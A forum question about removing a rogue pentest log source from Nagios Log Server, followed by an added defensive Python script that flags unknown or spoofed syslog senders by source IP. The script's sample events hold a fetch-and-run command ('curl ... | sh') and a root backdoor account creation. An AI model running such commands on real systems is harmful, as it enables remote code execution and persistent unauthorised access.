Remove Log Source?
Posted: Fri Jul 10, 2015 11:32 am
Hi, I'm evaluating NLS, running it as a VM and I'm really starting to see the value in using this in our environment. I have a really newb question, though: how do you remove log sources from NLS?
Here's my situation:
We are having a pentest conducted and one of the things they did was add their pentest machine to NLS and start sending commands for remote execution into the logs. It's pretty easy to add any machine to NLS if you know the URL to grab to install the script. I realize I could ask to get access to the machine and change its rsyslog config, but it is for all intents and purposes a rogue machine. I could also just blacklist the IP and MAC, but then I could possibly be doing that for a lot of IPs if it hops around.
So, is there a way to tell NLS "stop receiving logs from this machine"? And further, is there a way to validate what machines are added to NLS so that something like this doesn't happen for real?
Thank you!
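The second question in the post, validating which machines are actually shipping logs, comes down to comparing what arrives at the receiver against an inventory. The script below is an added example written for this page; it is not code from the original post, from the poster, or from NLS itself, and it does not use any NLS feature. It assumes the receiver can pair each raw syslog line with the source IP of the socket it came in on (the `SAMPLE_EVENTS` tuples and the `APPROVED_SENDERS` inventory are constructed for the example). The point it adds beyond the post is that the hostname inside an RFC 3164 line is written by the sender and is therefore attacker-controlled, so a rogue box can claim to be `web01`; the source IP seen by the receiver is the field to key on, and an allowlist keyed on both catches the two cases separately.

```python
import re

# Constructed sample events (not taken from the original post): each entry is the
# source IP the receiving socket saw, plus the raw RFC 3164 line the sender wrote.
# 10.0.9.9 plays the pentester's box: first under its own name, then spoofing web01.
SAMPLE_EVENTS = [
    ("10.0.0.11", "Jul 10 11:20:01 web01 sshd[2211]: Accepted publickey for deploy from 10.0.0.5 port 51022"),
    ("10.0.0.12", "Jul 10 11:20:03 db01 postgres[901]: LOG:  database system is ready to accept connections"),
    ("10.0.9.9",  "Jul 10 11:21:17 kali-box logger[1337]: curl http://10.0.9.9/x.sh | sh"),
    ("10.0.9.9",  "Jul 10 11:21:18 web01 logger[1338]: useradd -o -u 0 backdoor"),
    ("10.0.0.11", "Jul 10 11:22:40 web01 cron[2300]: (root) CMD (run-parts /etc/cron.hourly)"),
]

# Assumed inventory (hypothetical; in practice pulled from a CMDB or DHCP reservations):
# hostname a sender may claim -> the one source IP it is allowed to claim it from.
APPROVED_SENDERS = {
    "web01": "10.0.0.11",
    "db01": "10.0.0.12",
    "app01": "10.0.0.13",
}

# Minimal RFC 3164 parser: "Mon DD HH:MM:SS host tag[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<tag>[^:\[ ]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)


def parse_syslog(line):
    """Return the parsed fields of one RFC 3164 line, or None if it does not match."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def classify(src_ip, line, approved=APPROVED_SENDERS):
    """Verdict for one event: 'ok', 'unknown-host', 'spoofed-host' or 'unparsed'.

    The hostname is self-reported by the sender, so it is only trusted when the
    receiver-observed source IP matches the inventory entry for that name.
    """
    rec = parse_syslog(line)
    if rec is None:
        return "unparsed"
    host = rec["host"]
    if host not in approved:
        return "unknown-host"        # nobody in the inventory uses this name
    if approved[host] != src_ip:
        return "spoofed-host"        # known name, but sent from the wrong address
    return "ok"


def audit(events, approved=APPROVED_SENDERS):
    """Group every non-ok event by source IP, so one rogue box is one finding
    regardless of how many hostnames it claims."""
    findings = {}
    for src_ip, line in events:
        verdict = classify(src_ip, line, approved)
        if verdict == "ok":
            continue
        findings.setdefault(src_ip, []).append((verdict, line))
    return findings


if __name__ == "__main__":
    for src_ip, hits in audit(SAMPLE_EVENTS).items():
        print(f"{src_ip}: {len(hits)} suspicious event(s)")
        for verdict, line in hits:
            print(f"  [{verdict}] {line}")
```

Run against the constructed events, `audit` reports a single finding for 10.0.9.9 containing one `unknown-host` line (the `kali-box` name) and one `spoofed-host` line (the forged `web01` entry), while the genuine `web01` and `db01` traffic passes. Grouping by source IP rather than by claimed hostname is what makes a hopping attacker show up as a short list of addresses to block at the receiver or firewall, which is the practical answer to the "blacklist a lot of IPs" concern. Whether the log server exposes the receiver-side source address as a searchable field is something to check in its own documentation; this example assumes it does.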